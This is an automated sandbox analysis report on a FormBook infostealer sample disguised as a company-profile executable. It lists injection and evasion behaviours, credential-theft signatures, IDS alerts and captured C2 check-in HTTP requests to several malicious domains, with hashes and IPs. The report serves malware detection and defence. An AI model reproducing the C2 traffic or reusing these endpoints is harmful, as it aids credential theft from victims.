Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1companyProfileandproducts.exe

Overview

General Information

Sample name:z1companyProfileandproducts.exe
Analysis ID:1627430
MD5:69fd79206053b8c32283a87ffebb38ae
SHA1:347d8d82970ead463e0497a082df88ab8b74ac49
SHA256:7714e81aa7cf6d3614e229c000c114452847e2eaa2ae89896481b35413c12f48
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • z1companyProfileandproducts.exe (PID: 2696 cmdline: "C:\Users\user\Desktop\z1companyProfileandproducts.exe" MD5: 69FD79206053B8C32283A87FFEBB38AE)
    • cAPvHN0KfrpQXKK.exe (PID: 3372 cmdline: "C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\V6eYtrWSxBlv.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • unregmp2.exe (PID: 6208 cmdline: "C:\Windows\SysWOW64\unregmp2.exe" MD5: 51629AAAF753C6411D0B7D37620B7A83)
        • cAPvHN0KfrpQXKK.exe (PID: 4428 cmdline: "C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\0a1BBOCBbMMKv.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • firefox.exe (PID: 5840 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3347455545.00000000045C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.3347408505.0000000004570000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2712122169.0000000001C80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.3346834003.0000000000890000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.2710662853.0000000000D21000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.z1companyProfileandproducts.exe.d20000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-02T12:03:30.025606+010020507451Malware Command and Control Activity Detected192.168.2.5499773.33.130.19080TCP
              2025-03-02T12:03:54.274363+010020507451Malware Command and Control Activity Detected192.168.2.54998213.248.169.4880TCP
              2025-03-02T12:04:07.466799+010020507451Malware Command and Control Activity Detected192.168.2.5499863.33.130.19080TCP
              2025-03-02T12:04:21.067278+010020507451Malware Command and Control Activity Detected192.168.2.549990104.21.80.180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-02T12:03:30.025606+010028554651A Network Trojan was detected192.168.2.5499773.33.130.19080TCP
              2025-03-02T12:03:54.274363+010028554651A Network Trojan was detected192.168.2.54998213.248.169.4880TCP
              2025-03-02T12:04:07.466799+010028554651A Network Trojan was detected192.168.2.5499863.33.130.19080TCP
              2025-03-02T12:04:21.067278+010028554651A Network Trojan was detected192.168.2.549990104.21.80.180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-02T12:03:45.576198+010028554641A Network Trojan was detected192.168.2.54997913.248.169.4880TCP
              2025-03-02T12:03:48.095772+010028554641A Network Trojan was detected192.168.2.54998013.248.169.4880TCP
              2025-03-02T12:03:50.667982+010028554641A Network Trojan was detected192.168.2.54998113.248.169.4880TCP
              2025-03-02T12:03:59.785975+010028554641A Network Trojan was detected192.168.2.5499833.33.130.19080TCP
              2025-03-02T12:04:02.423509+010028554641A Network Trojan was detected192.168.2.5499843.33.130.19080TCP
              2025-03-02T12:04:04.932495+010028554641A Network Trojan was detected192.168.2.5499853.33.130.19080TCP
              2025-03-02T12:04:13.385122+010028554641A Network Trojan was detected192.168.2.549987104.21.80.180TCP
              2025-03-02T12:04:16.022797+010028554641A Network Trojan was detected192.168.2.549988104.21.80.180TCP
              2025-03-02T12:04:18.575429+010028554641A Network Trojan was detected192.168.2.549989104.21.80.180TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: z1companyProfileandproducts.exeAvira: detected
              Multi AV Scanner detection for submitted file
              Source: z1companyProfileandproducts.exeVirustotal: Detection: 69%Perma Link
              Source: z1companyProfileandproducts.exeReversingLabs: Detection: 71%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.z1companyProfileandproducts.exe.d20000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3347455545.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3347408505.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712122169.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3346834003.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2710662853.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712196168.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3347720640.0000000004650000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: z1companyProfileandproducts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: z1companyProfileandproducts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: unregmp2.pdb source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.000000000134D000.00000004.00000020.00020000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347268047.000000000145E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: z1companyProfileandproducts.exe, 00000000.00000003.2604771684.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001ACE000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001930000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000003.2606734724.0000000001783000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000003.2710543672.0000000004474000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000003.2714618784.0000000004625000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.000000000496E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: z1companyProfileandproducts.exe, z1companyProfileandproducts.exe, 00000000.00000003.2604771684.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001ACE000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001930000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000003.2606734724.0000000001783000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000004.00000003.2710543672.0000000004474000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000003.2714618784.0000000004625000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.000000000496E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: unregmp2.pdbGCTL source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.000000000134D000.00000004.00000020.00020000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347268047.000000000145E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cAPvHN0KfrpQXKK.exe, 00000003.00000000.2627217059.0000000000B8F000.00000002.00000001.01000000.00000005.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000000.2781026004.0000000000B8F000.00000002.00000001.01000000.00000005.sdmp
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008ACD20 FindFirstFileW,FindNextFileW,FindClose,4_2_008ACD20
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then xor eax, eax4_2_00899FA0
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4x nop then mov ebx, 00000004h4_2_046C04DF

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 104.21.80.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 104.21.80.1:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 104.21.80.1:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49977 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49977 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49990 -> 104.21.80.1:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49986 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 104.21.80.1:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49982 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49982 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 3.33.130.190:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.dappbtc.xyz
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /trb7/?Fz_=qHEtbb90tLjTN0x0&505xOj4=Xdn7dmByJ0SORf47t42bAx5WV1eyCacQKmkFCNQ6K2u6nUFId+HMmpMPHimZ5g5DxJKoilAcLigxWiGxpbKVMyeIdZnhYq/apiGHlDjJn/QLlWHX8msAwn+Pvjx8OaMCFw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.orbt.zoneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
              Source: global trafficHTTP traffic detected: GET /oiz0/?505xOj4=9v52S88T1gt5Tc2r5fMP4iQJv1OwsGvqWAUGmfB8mEPwD/VFfrObpLTzAs1Uk7jQTseEv8LuraBd/6FxjeW4VhjFroZ6+sME+SOo2g6WIidsbUGcBERugzeokGvmwW9kTw==&Fz_=qHEtbb90tLjTN0x0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
              Source: global trafficHTTP traffic detected: GET /je5x/?505xOj4=SsfMhk4dJssrOiNp2G01dlzI+k/eTbfsdjnjc1R6LZ/pW30W4rr7y9ry7X+UgyNXNMtIRXvZ5DXQMf4LLsE11oRVNvKdTWL9WtrriEIGgs1R8zfOom7pbjefjfwzTRhqcA==&Fz_=qHEtbb90tLjTN0x0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.thefounder.ceoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
              Source: global trafficHTTP traffic detected: GET /uoki/?505xOj4=hR9UOSbKbp2VMtCNgsThRLVgOj20o3kqc+HH/sAhIWQh/y8XK28Ees9JEd/zrjBVUS7En1yL3QSm+iVMrAfiT2KvS+Z+Z7/3ta2gK53urmJl5KknktZIr1czqmYoD40z/w==&Fz_=qHEtbb90tLjTN0x0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dd87558.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
              Source: global trafficDNS traffic detected: DNS query: www.orbt.zone
              Source: global trafficDNS traffic detected: DNS query: www.dappbtc.xyz
              Source: global trafficDNS traffic detected: DNS query: www.thefounder.ceo
              Source: global trafficDNS traffic detected: DNS query: www.dd87558.vip
              Source: unknownHTTP traffic detected: POST /oiz0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzCache-Control: max-age=0Content-Length: 208Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.dappbtc.xyzReferer: http://www.dappbtc.xyz/oiz0/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)Data Raw: 35 30 35 78 4f 6a 34 3d 77 74 52 57 52 49 52 52 35 79 35 49 62 61 50 77 37 2f 31 69 2f 54 42 5a 71 55 36 4f 6c 30 44 47 55 52 78 72 73 38 52 33 68 57 2b 48 62 4e 6c 5a 55 62 4f 33 6b 62 43 49 48 63 42 58 39 59 6e 48 52 4f 61 64 76 4a 4c 37 77 4c 77 76 2f 73 42 46 75 4f 61 75 42 6c 76 4b 6f 70 52 51 69 38 30 6c 76 54 69 77 39 46 61 6e 4c 69 4a 4d 51 32 72 6d 58 32 4a 42 39 78 6d 58 6b 57 53 68 67 33 51 6f 42 47 2b 68 54 38 47 71 70 36 4a 6e 6b 35 75 51 4b 67 70 7a 46 45 6f 42 6b 36 4b 6a 48 75 75 61 52 48 36 71 75 32 4f 45 76 2b 67 68 54 44 77 6c 79 78 36 63 35 72 4a 64 6d 79 76 43 4d 76 4d 53 34 32 4b 33 6d 70 4d 3d Data Ascii: 505xOj4=wtRWRIRR5y5IbaPw7/1i/TBZqU6Ol0DGURxrs8R3hW+HbNlZUbO3kbCIHcBX9YnHROadvJL7wLwv/sBFuOauBlvKopRQi80lvTiw9FanLiJMQ2rmX2JB9xmXkWShg3QoBG+hT8Gqp6Jnk5uQKgpzFEoBk6KjHuuaRH6qu2OEv+ghTDwlyx6c5rJdmyvCMvMS42K3mpM=
              Source: cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347240996.00000000010AA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dd87558.vip
              Source: cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347240996.00000000010AA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dd87558.vip/uoki/
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: unregmp2.exe, 00000004.00000003.2891768149.0000000007ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: unregmp2.exe, 00000004.00000003.2896109163.0000000007B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.z1companyProfileandproducts.exe.d20000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3347455545.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3347408505.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712122169.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3346834003.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2710662853.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712196168.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3347720640.0000000004650000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D4CCD3 NtClose,0_2_00D4CCD3
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2B60 NtClose,LdrInitializeThunk,0_2_019A2B60
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_019A2DF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_019A2C70
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A35C0 NtCreateMutant,LdrInitializeThunk,0_2_019A35C0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A4340 NtSetContextThread,0_2_019A4340
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A4650 NtSuspendThread,0_2_019A4650
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2B80 NtQueryInformationFile,0_2_019A2B80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2BA0 NtEnumerateValueKey,0_2_019A2BA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2BF0 NtAllocateVirtualMemory,0_2_019A2BF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2BE0 NtQueryValueKey,0_2_019A2BE0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2AB0 NtWaitForSingleObject,0_2_019A2AB0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2AD0 NtReadFile,0_2_019A2AD0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2AF0 NtWriteFile,0_2_019A2AF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2DB0 NtEnumerateKey,0_2_019A2DB0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2DD0 NtDelayExecution,0_2_019A2DD0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2D10 NtMapViewOfSection,0_2_019A2D10
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2D00 NtSetInformationFile,0_2_019A2D00
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2D30 NtUnmapViewOfSection,0_2_019A2D30
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2CA0 NtQueryInformationToken,0_2_019A2CA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2CC0 NtQueryVirtualMemory,0_2_019A2CC0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2CF0 NtOpenProcess,0_2_019A2CF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2C00 NtQueryInformationProcess,0_2_019A2C00
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2C60 NtCreateKey,0_2_019A2C60
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2F90 NtProtectVirtualMemory,0_2_019A2F90
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2FB0 NtResumeThread,0_2_019A2FB0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2FA0 NtQuerySection,0_2_019A2FA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2FE0 NtCreateFile,0_2_019A2FE0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2F30 NtCreateSection,0_2_019A2F30
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2F60 NtCreateProcessEx,0_2_019A2F60
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2E80 NtReadVirtualMemory,0_2_019A2E80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2EA0 NtAdjustPrivilegesToken,0_2_019A2EA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2EE0 NtQueueApcThread,0_2_019A2EE0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A2E30 NtWriteVirtualMemory,0_2_019A2E30
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A3090 NtSetValueKey,0_2_019A3090
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A3010 NtOpenDirectoryObject,0_2_019A3010
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A39B0 NtGetContextThread,0_2_019A39B0
